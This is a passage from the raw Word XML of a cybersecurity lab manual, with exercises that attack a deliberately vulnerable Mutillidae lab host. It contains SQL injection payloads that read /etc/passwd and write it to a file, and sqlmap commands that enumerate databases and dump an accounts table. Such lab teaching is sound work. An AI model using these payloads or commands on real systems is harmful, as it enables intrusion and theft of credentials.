          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00613CAB" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
        </w:rPr>
        <w:t>null, null,null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D316B9" w14:textId="77777777" w:rsidR="00374345" w:rsidRPr="00E62DA3" w:rsidRDefault="00374345" w:rsidP="00374345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19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  <w:i/>
        </w:rPr>
        <w:t>union select null, load_file('/etc/passwd'), null, null,null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1BAC18" w14:textId="77777777" w:rsidR="00374345" w:rsidRPr="00E62DA3" w:rsidRDefault="00374345" w:rsidP="00374345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19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  <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">union select null, load_file('/etc/passwd'), null, null,null into outfile </w:t>
      </w:r>
      <w:r w:rsidR="009B2F3B" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00BE152E" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
        </w:rPr>
        <w:t>/t</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
        </w:rPr>
        <w:t>mp/myout.txt</w:t>
      </w:r>
      <w:r w:rsidR="009B2F3B" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A5FC58" w14:textId="77777777" w:rsidR="008E018A" w:rsidRPr="008E018A" w:rsidRDefault="008E018A" w:rsidP="00613CAB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590ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Write down your observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE9DD3" w14:textId="77777777" w:rsidR="006D2346" w:rsidRDefault="006D2346" w:rsidP="008E018A">
      <w:pPr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Task 7</w:t>
      </w:r>
      <w:r w:rsidRPr="0043542E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia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000000"/>
        </w:rPr>
        <w:t>Using SQLmap for SQL injection Pen Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59898A08" w14:textId="77777777" w:rsidR="00561E97" w:rsidRPr="00DB2B28" w:rsidRDefault="00561E97" w:rsidP="00561E97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DB2B28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Type the </w:t>
      </w:r>
      <w:r w:rsidR="00342BC7" w:rsidRPr="00DB2B28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">following </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2B28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="00342BC7" w:rsidRPr="00DB2B28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8141B5" w14:textId="77777777" w:rsidR="00561E97" w:rsidRPr="00E62DA3" w:rsidRDefault="00FF75AC" w:rsidP="008E018A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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>sqlmap -u "http://10.0.2.10/mutillidae/index.php?page=user-info.php&amp;username=aaa&amp;password=123456&amp;user-info-php-submit-button=View+Account+Details"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C26657" w14:textId="77777777" w:rsidR="003466F2" w:rsidRPr="00E62DA3" w:rsidRDefault="00334C66" w:rsidP="00BD1991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 w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07FB2049" wp14:editId="4812457E">
            <wp:extent cx="5943600" cy="9493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CEA2E" w14:textId="62A26AA7" w:rsidR="00342BC7" w:rsidRPr="00E62DA3" w:rsidRDefault="00342BC7" w:rsidP="00342BC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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>sql</w:t>
      </w:r>
      <w:r w:rsidR="00AE280B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F10A0A2" w14:textId="77777777" w:rsidR="00342BC7" w:rsidRPr="00E62DA3" w:rsidRDefault="00FF75AC" w:rsidP="00342BC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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 xml:space="preserve">sqlmap -u "http://10.0.2.10/mutillidae/index.php?page=user-info.php&amp;username=aaa&amp;password=123456&amp;user-info-php-submit-button=View+Account+Details" </w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="009C33D9" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF29FC" w14:textId="77777777" w:rsidR="00A74989" w:rsidRPr="00E62DA3" w:rsidRDefault="00FF75AC" w:rsidP="00FF75AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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lastRenderedPageBreak/>
        <w:t xml:space="preserve">sqlmap -u "http://10.0.2.10/mutillidae/index.php?page=user-info.php&amp;username=aaa&amp;password=123456&amp;user-info-php-submit-button=View+Account+Details" </w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>--current-user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212A9F29" w14:textId="77777777" w:rsidR="00AE217D" w:rsidRPr="00E62DA3" w:rsidRDefault="00AE217D" w:rsidP="00AE217D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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 xml:space="preserve">sqlmap -u "http://10.0.2.10/mutillidae/index.php?page=user-info.php&amp;username=aaa&amp;password=123456&amp;user-info-php-submit-button=View+Account+Details" </w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>--current-db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B28B00C" w14:textId="77777777" w:rsidR="00B23759" w:rsidRPr="00E62DA3" w:rsidRDefault="00B23759" w:rsidP="00B23759">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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 xml:space="preserve">sqlmap -u "http://10.0.2.10/mutillidae/index.php?page=user-info.php&amp;username=aaa&amp;password=123456&amp;user-info-php-submit-button=View+Account+Details" </w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>--tables -D owasp10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F6B97D" w14:textId="77777777" w:rsidR="009F05C2" w:rsidRPr="00E62DA3" w:rsidRDefault="00BF1705" w:rsidP="009F05C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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>sqlmap -u "</w:t>
      </w:r>
      <w:r w:rsidR="009F05C2" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>http://10.0.2.10/mutillidae/index.php?page=user-info.php&amp;username=aaa&amp;password=123456&amp;user-info-php-submit-button=View+Acc</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F05C2" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">ount+Details" </w:t>
      </w:r>
      <w:r w:rsidR="009F05C2" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>--columns -T accounts -D owasp10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E36D770" w14:textId="77CC345E" w:rsidR="00980E14" w:rsidRPr="00E62DA3" w:rsidRDefault="00980E14" w:rsidP="00980E14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://10.0.2.10/mutillidae/index.php?page=user-info.php&amp;username=aaa&amp;password=123456&amp;user-info-php-submit-button=View+Account+Details" </w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">-T accounts -D owasp10 </w:t>
      </w:r>
      <w:r w:rsidR="00DB2B28" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="001A25F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F3B42A" w14:textId="77777777" w:rsidR="00DB2B28" w:rsidRPr="00DB2B28" w:rsidRDefault="00DB2B28" w:rsidP="00DB2B28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085365E2" w14:textId="77777777" w:rsidR="003466F2" w:rsidRDefault="00DB2B28" w:rsidP="00DB2B28">
      <w:pPr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/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Task 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278528B" w14:textId="77777777" w:rsidR="00DB2B28" w:rsidRPr="00227881" w:rsidRDefault="00DB2B28" w:rsidP="00DB2B2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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00227881">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>What is SQL injection attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D033DE4" w14:textId="77777777" w:rsidR="00DB2B28" w:rsidRPr="00227881" w:rsidRDefault="00DB2B28" w:rsidP="00DB2B2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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00227881">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>How to prevent SQL injection attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A31CA" w14:textId="77777777" w:rsidR="00DB2B28" w:rsidRPr="00227881" w:rsidRDefault="00DB2B28" w:rsidP="00DB2B2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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00227881">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>How can you find a website that contains SQL injection vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6504FAAE" w14:textId="77777777" w:rsidR="00DB2B28" w:rsidRDefault="00DB2B28" w:rsidP="00DB2B28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B11DF6C" w14:textId="77777777" w:rsidR="003466F2" w:rsidRDefault="00E310E0" w:rsidP="00BD1991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0000DCBA" wp14:editId="3C2078E7">
            <wp:extent cx="4910275" cy="2127786"/>
            <wp:effectExtent l="152400" t="152400" r="367030" b="3683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15293" cy="21299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B4EF87" w14:textId="77777777" w:rsidR="00BD1991" w:rsidRDefault="00BD1991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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0355D7DA" w14:textId="77777777" w:rsidR="006542B7" w:rsidRDefault="006542B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770985">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F467674" w14:textId="77777777" w:rsidR="00633244" w:rsidRPr="002975AE" w:rsidRDefault="00633244" w:rsidP="002975AE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 w:rsidRPr="002975AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>https://information.rapid7.com/metasploitable-download.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3AF2B8" w14:textId="77777777" w:rsidR="00F661BD" w:rsidRDefault="00F661BD" w:rsidP="00F661BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797E479E" w14:textId="77777777" w:rsidR="00F661BD" w:rsidRDefault="00F661BD" w:rsidP="00F661BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8E833D" w14:textId="77777777" w:rsidR="00F661BD" w:rsidRDefault="00F661BD" w:rsidP="00F661BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="024DAB55" w14:textId="77777777" w:rsidR="00F661BD" w:rsidRPr="00F661BD" w:rsidRDefault="00F661BD" w:rsidP="00F661BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F661BD" w:rsidRPr="00F661BD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764B81" w14:textId="77777777" w:rsidR="002030C3" w:rsidRDefault="002030C3" w:rsidP="00EB2649">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="04EFC678" w14:textId="77777777" w:rsidR="002030C3" w:rsidRDefault="002030C3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Print">
    <w:altName w:val="Times New Roman"/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2E1CDDF" w14:textId="77777777" w:rsidR="00633244" w:rsidRDefault="00633244">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="2BA3971D" w14:textId="77777777" w:rsidR="00633244" w:rsidRPr="00AF6EFD" w:rsidRDefault="00633244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F26637" w:rsidRPr="00F26637">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="3DE908BB" w14:textId="77777777" w:rsidR="00633244" w:rsidRPr="009C26E5" w:rsidRDefault="00633244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3F8B15" w14:textId="77777777" w:rsidR="002030C3" w:rsidRDefault="002030C3" w:rsidP="00EB2649">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="165F2FD5" w14:textId="77777777" w:rsidR="002030C3" w:rsidRDefault="002030C3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12B24C" w14:textId="77777777" w:rsidR="00633244" w:rsidRPr="0074054E" w:rsidRDefault="00633244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 xml:space="preserve">Cybersecurity Lab Manual       </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="594EC355" w14:textId="77777777" w:rsidR="00633244" w:rsidRPr="009C26E5" w:rsidRDefault="00633244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FA51FA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75D2ED3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9788BC7E"/>
    <w:lvl w:ilvl="0" w:tplc="A63CDD8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11AF1461"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14E04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D42A9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14E04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AE71DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8C83CF6"/>
    <w:lvl w:ilvl="0" w:tplc="2856C7E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1C0B8D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D4EA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1A597706"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF5EC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>
    <w:nsid w:val="32621B1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D4EA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B128E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D4EA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5C2B247A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14E04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48A5F89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90EAF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6F295F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="69A8BC5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03A2140"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14E04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>
    <w:nsid w:val="787C02AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23E2FBE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79021334"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D4EA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9"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="14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oFAJiNlcAtAAAA"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00615E00"/>
    <w:rsid w:val="00006176"/>
    <w:rsid w:val="000161F5"/>
    <w:rsid w:val="000170C8"/>
    <w:rsid w:val="00042B97"/>
    <w:rsid w:val="000532E1"/>
    <w:rsid w:val="00055445"/>
    <w:rsid w:val="00056774"/>
    <w:rsid w:val="00056B0A"/>
    <w:rsid w:val="00060A7A"/>
    <w:rsid w:val="000676CC"/>
    <w:rsid w:val="000A1411"/>
    <w:rsid w:val="000D394C"/>
    <w:rsid w:val="00165FCA"/>
    <w:rsid w:val="00186F68"/>
    <w:rsid w:val="001A0546"/>
    <w:rsid w:val="001A1888"/>
    <w:rsid w:val="001A25F5"/>
    <w:rsid w:val="001B5B62"/>
    <w:rsid w:val="001C1CAE"/>
    <w:rsid w:val="001D6350"/>
    <w:rsid w:val="001F42CE"/>
    <w:rsid w:val="002030C3"/>
    <w:rsid w:val="00213494"/>
    <w:rsid w:val="0022091C"/>
    <w:rsid w:val="00227881"/>
    <w:rsid w:val="00237DBC"/>
    <w:rsid w:val="00265FEC"/>
    <w:rsid w:val="002823B1"/>
    <w:rsid w:val="00285F2E"/>
    <w:rsid w:val="002975AE"/>
    <w:rsid w:val="002A278A"/>
    <w:rsid w:val="002E4979"/>
    <w:rsid w:val="002E5842"/>
    <w:rsid w:val="00303E10"/>
    <w:rsid w:val="00305841"/>
    <w:rsid w:val="00307B16"/>
    <w:rsid w:val="0031104A"/>
    <w:rsid w:val="0032426B"/>
    <w:rsid w:val="00334C66"/>
    <w:rsid w:val="00342BC7"/>
    <w:rsid w:val="003466F2"/>
    <w:rsid w:val="003637C9"/>
    <w:rsid w:val="00370BE3"/>
    <w:rsid w:val="00374345"/>
    <w:rsid w:val="003D4F9B"/>
    <w:rsid w:val="003E1F7E"/>
    <w:rsid w:val="003F0F68"/>
    <w:rsid w:val="003F34E9"/>
    <w:rsid w:val="0040093A"/>
    <w:rsid w:val="0043542E"/>
    <w:rsid w:val="00440472"/>
    <w:rsid w:val="0044590F"/>
    <w:rsid w:val="0046514E"/>
    <w:rsid w:val="004747E9"/>
    <w:rsid w:val="004779BB"/>
    <w:rsid w:val="004919BF"/>
    <w:rsid w:val="004A2C2C"/>
    <w:rsid w:val="004B18DC"/>
    <w:rsid w:val="004B368E"/>
    <w:rsid w:val="00522AD0"/>
    <w:rsid w:val="0052713A"/>
    <w:rsid w:val="0054590D"/>
    <w:rsid w:val="00550096"/>
    <w:rsid w:val="005613F5"/>
    <w:rsid w:val="00561E97"/>
    <w:rsid w:val="00574A55"/>
    <w:rsid w:val="0057571C"/>
    <w:rsid w:val="0058093E"/>
    <w:rsid w:val="00590ECB"/>
    <w:rsid w:val="00594AD1"/>
    <w:rsid w:val="005A3141"/>
    <w:rsid w:val="005D4228"/>
    <w:rsid w:val="005E2847"/>
    <w:rsid w:val="00610963"/>
    <w:rsid w:val="00613CAB"/>
    <w:rsid w:val="00613D0C"/>
    <w:rsid w:val="00615E00"/>
    <w:rsid w:val="00623879"/>
    <w:rsid w:val="00625802"/>
    <w:rsid w:val="006274CD"/>
    <w:rsid w:val="00633244"/>
    <w:rsid w:val="00635642"/>
    <w:rsid w:val="00643173"/>
    <w:rsid w:val="00652256"/>
    <w:rsid w:val="006542B7"/>
    <w:rsid w:val="00667B0B"/>
    <w:rsid w:val="00686EE0"/>
    <w:rsid w:val="006B6771"/>
    <w:rsid w:val="006C4A2E"/>
    <w:rsid w:val="006D2346"/>
    <w:rsid w:val="006D43CC"/>
    <w:rsid w:val="006E3591"/>
    <w:rsid w:val="006E378F"/>
    <w:rsid w:val="006F0412"/>
    <w:rsid w:val="006F3D8C"/>
    <w:rsid w:val="0071597A"/>
    <w:rsid w:val="00716D8F"/>
    <w:rsid w:val="007220D5"/>
    <w:rsid w:val="00724E5D"/>
    <w:rsid w:val="0074054E"/>
    <w:rsid w:val="00740B7D"/>
    <w:rsid w:val="00756082"/>
    <w:rsid w:val="0077037E"/>
    <w:rsid w:val="00770985"/>
    <w:rsid w:val="007A31EE"/>
    <w:rsid w:val="007A5427"/>
    <w:rsid w:val="007A7691"/>
    <w:rsid w:val="007B574F"/>
    <w:rsid w:val="007D6519"/>
    <w:rsid w:val="007E06AE"/>
    <w:rsid w:val="007F31C8"/>
    <w:rsid w:val="00804360"/>
    <w:rsid w:val="00815464"/>
    <w:rsid w:val="0081564B"/>
    <w:rsid w:val="00834243"/>
    <w:rsid w:val="00860F91"/>
    <w:rsid w:val="00862FD1"/>
    <w:rsid w:val="00867176"/>
    <w:rsid w:val="008839E7"/>
    <w:rsid w:val="008A73E8"/>
    <w:rsid w:val="008C575B"/>
    <w:rsid w:val="008E018A"/>
    <w:rsid w:val="008E20C1"/>
    <w:rsid w:val="00962BD0"/>
    <w:rsid w:val="009632DC"/>
    <w:rsid w:val="00970B29"/>
    <w:rsid w:val="009801A3"/>
    <w:rsid w:val="00980E14"/>
    <w:rsid w:val="009855CC"/>
    <w:rsid w:val="009A4150"/>
    <w:rsid w:val="009B2F3B"/>
    <w:rsid w:val="009B491C"/>
    <w:rsid w:val="009C26E5"/>
    <w:rsid w:val="009C33D9"/>
    <w:rsid w:val="009D7814"/>
    <w:rsid w:val="009E7C2D"/>
    <w:rsid w:val="009F05C2"/>
